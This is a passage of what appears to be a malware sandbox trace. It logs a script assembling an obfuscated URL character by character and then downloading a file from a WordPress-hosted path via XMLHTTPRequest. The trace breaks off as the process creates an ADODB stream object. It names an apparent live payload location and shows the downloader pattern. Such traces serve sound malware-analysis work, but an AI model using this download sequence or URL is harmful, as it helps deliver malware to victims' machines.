lpWideCharStr=":") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https", bstrRight=":", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb68d8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https:", bstrRight="/", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7598, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https:/", bstrRight="/", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb76b8, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://", bstrRight="w", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb70f8, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://w", bstrRight="w", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb76f8, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://ww", bstrRight="w", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb71b8, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://www", bstrRight=".", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb70d8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://www.", bstrRight="r", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb75f8, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://www.r", bstrRight="a", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb76d8, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://www.ra", bstrRight="b", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7498, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0061.461] VarBstrCat (in: bstrLeft="https://www.rab", bstrRight="a", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb72f8, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.raba", bstrRight="d", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7218, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabad", bstrRight="a", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7618, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabada", bstrRight="u", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb71f8, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadau", bstrRight="n", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7038, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun", bstrRight=".", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7238, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.", bstrRight="c", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7698, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.c", bstrRight="o", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb74f8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.co", bstrRight="m", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7518, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.com", bstrRight="/", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7318, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/", bstrRight="w", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7338, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/w", bstrRight="o", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6fd8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/wo", bstrRight="r", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7278, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0061.462] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/wor", bstrRight="d", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7178, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0061.463] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/word", bstrRight="p", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7258, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0061.463] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/wordp", bstrRight="r", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6f58, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.463] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/wordpr", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7118, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0061.463] VarBstrCat (in: bstrLeft="https://www.rabadaun.com/wordpre", bstrRight="s", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8d488, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0061.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8d818, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0061.464] VarBstrCat (in: bstrLeft="s", bstrRight="/", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8d098, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0061.464] VarBstrCat (in: bstrLeft="s/", bstrRight="w", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8ca08, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0061.464] VarBstrCat (in: bstrLeft="s/w", bstrRight="p", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7178, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp", bstrRight="-", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb71b8, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-", bstrRight="c", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7078, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-c", bstrRight="o", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7158, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-co", bstrRight="n", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb73d8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-con", bstrRight="t", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7418, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-cont", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb75d8, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-conte", bstrRight="n", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7238, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-conten", bstrRight="t", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7598, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-content", bstrRight="/", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb71f8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-content/", bstrRight="t", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb75b8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-content/t", bstrRight="h", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb76d8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-content/th", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7638, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0061.465] VarBstrCat (in: bstrLeft="s/wp-content/the", bstrRight="m", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb70b8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/them", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7218, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/theme", bstrRight="s", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb76f8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes", bstrRight="/", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7698, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes/", bstrRight="T", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7578, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes/T", bstrRight="E", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7438, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes/TE", bstrRight="M", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7718, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes/TEM", bstrRight="P", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6f38, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes/TEMP", bstrRight=".", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7458, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes/TEMP.", bstrRight="s", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7098, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0061.466] VarBstrCat (in: bstrLeft="s/wp-content/themes/TEMP.s", bstrRight="o", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.468] VarAdd (in: pvarLeft=0x1d39d7a5e00, pvarRight=0x1d39d7a5de8, pvarResult=0x1d39d7a6530 | out: pvarResult=0x1d39d7a6530) returned 0x0 [0061.468] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x1d39b4a5e30, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="Open", cNames=0x1, lcid=0x3300000409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=1) returned 0x0 [0061.469] XMLHTTPRequest:IDispatch:Invoke (in: This=0x1d39b4a5e30, dispIdMember=1, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d58*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x1d39d7a5d70*(varType=0x8, wReserved1=0x0, wReserved2=0x1d3, wReserved3=0x0, varVal1="https://www.rabadaun.com/wordpress/wp-content/themes/TEMP.so", varVal2=0x33e4fb6120), [2]=0x1d39d7a5d88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="get", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d58*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x1d39d7a5d70*(varType=0x8, wReserved1=0x0, wReserved2=0x1d3, wReserved3=0x0, varVal1="https://www.rabadaun.com/wordpress/wp-content/themes/TEMP.so", varVal2=0x33e4fb6120), [2]=0x1d39d7a5d88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="get", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0x400) returned 0x0 [0061.471] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x1d39b4a5e30, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="send", cNames=0x1, lcid=0x409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=5) returned 0x0 [0061.471] XMLHTTPRequest:IDispatch:Invoke (in: This=0x1d39b4a5e30, dispIdMember=5, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33e4fb60f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0x400) returned 0x0 [0063.651] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x1d39b4a5e30, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb60c0*="responseBody", cNames=0x1, lcid=0x1d300000409, rgDispId=0x33e4fb60a4 | out: rgDispId=0x33e4fb60a4*=11) returned 0x0 [0063.652] XMLHTTPRequest:IDispatch:Invoke (in: This=0x1d39b4a5e30, dispIdMember=11, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33e4fb6058*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1d39d7a6530, pExcepInfo=0x33e4fb6070, puArgErr=0x33e4fb6050 | out: pDispParams=0x33e4fb6058*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1d39d7a6530*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39e1cad30*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x1d39e1cad50*, rgsabound=((cElements=0x47000, lLbound=0))), varVal2=0x0), pExcepInfo=0x33e4fb6070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb6050*=0x400) returned 0x0 [0063.652] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x1d39b4a5e30, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb60c0*="Status", cNames=0x1, lcid=0x409, rgDispId=0x33e4fb60a4 | out: rgDispId=0x33e4fb60a4*=7) returned 0x0 [0063.652] XMLHTTPRequest:IDispatch:Invoke (in: This=0x1d39b4a5e30, dispIdMember=7, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33e4fb6058*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1d39d7a6530, pExcepInfo=0x33e4fb6070, puArgErr=0x33e4fb6050 | out: pDispParams=0x33e4fb6058*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1d39d7a6530*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x33e4fb6070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb6050*=0x400) returned 0x0 [0063.652] VarCmp (pvarLeft=0x1d39d7a6530, pvarRight=0x1d39d7a6518, lcid=0x0, dwFlags=0x30001) returned 0x1 [0063.652] CLSIDFromProgIDEx (in: lpszProgID="adodb.stream", lpclsid=0x33e4fb60f0 | out: lpclsid=0x33e4fb60f0*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4))) returned 0x0 [0063.654] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0063.654] CoCreateInstance (in: 